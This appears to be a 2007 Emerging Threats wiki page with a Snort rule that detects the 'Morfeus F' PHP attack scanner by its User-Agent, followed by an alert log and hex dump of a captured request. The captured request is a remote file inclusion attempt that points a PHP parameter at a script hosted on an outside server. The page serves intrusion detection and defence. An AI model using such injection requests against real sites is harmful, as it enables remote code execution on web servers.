EmergingThreats> Main Web>2003466 (revision 2)EditAttach

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg: "BLEEDING-EDGE EXPLOIT PHP Attack Tool Morfeus F Scanner"; flow:established,to_server; content:"User-Agent\:"; nocase; pcre:"/User-Agent\:[^\n]+Morfeus\x20F/i"; reference:url,www.webmasterworld.com/search_engine_spiders/3227720.htm; classtype:web-application-attack; sid:2003466; rev:1;)

Added 2007-03-08 12:08:30 UTC

Packet using the Scanner: [**] [1:2002997:2] BLEEDING-EDGE WEB PHP Remote File Inclusion (monster list http) [**] [Classification: Web Application Attack] [Priority: 1] [Xref => http://www.sans.org/top20/] Event ID: 818 Event Reference: 818 03/05/07-17:31:53.070000 209.172.33.70:52548 -> x.x.x.x:80 TCP TTL:50 TOS:0x20 ID:57259 IpLen?:20 DgmLen?:289 DF **AP** Seq: 0x44D8481D Ack: 0xD3185DF3 Win: 0x5B4 TcpLen?: 32 TCP Options (3) => NOP NOP TS: 1763284923 2818644511 47 45 54 20 2F 61 64 6D 69 6E 2F 69 6D 61 67 65 GET /admin/image 73 2E 70 68 70 3F 64 6F 6E 73 69 6D 67 5F 62 61 s.php?donsimg_ba 73 65 5F 70 61 74 68 3D 68 74 74 70 3A 2F 2F 32 se_path=http://2 30 33 2E 31 39 38 2E 36 38 2E 32 33 36 2F 7E 6C 03.198.68.236/~l 69 73 69 72 2F 4D 2E 74 78 74 3F 26 2F 20 48 54 isir/M.txt?&/ HT 54 50 2F 31 2E 31 0D 0A 41 63 63 65 70 74 3A 20 TP/1.1..Accept: 2A 2F 2A 0D 0A 41 63 63 65 70 74 2D 4C 61 6E 67 /..Accept-Lang 75 61 67 65 3A 20 65 6E 2D 75 73 0D 0A 41 63 63 uage: en-us..Acc 65 70 74 2D 45 6E 63 6F 64 69 6E 67 3A 20 67 7A ept-Encoding: gz 69 70 2C 20 64 65 66 6C 61 74 65 0D 0A 55 73 65 ip, deflate..Use 72 2D 41 67 65 6E 74 3A 20 4D 6F 72 66 65 75 73 r-Agent: Morfeus 20 46 75 63 6B 69 6E 67 20 53 63 61 6E 6E 65 72 F**king Scanner 0D 0A 48 6F 73 74 3A 20 XX XX XX XX XX XX XX XX ..Host: XXXXXXXX XX XX XX XX XX XX 0D 0A 43 6F 6E 6E 65 63 74 69 XXXXXX..Connecti 6F 6E 3A 20 43 6C 6F 73 65 0D 0A 0D 0A on: Close....

-- ShirkDog? - 08 Mar 2007


Edit | Attach | Print version | History: r4 < r3 < r2 < r1 | Backlinks | Raw View | Raw edit | More topic actions...
Topic revision: r2 - 2007-03-08 - ShirkDog?
 
This site is powered by the TWiki collaboration platform Powered by Perl This site is powered by the TWiki collaboration platformCopyright © Emerging Threats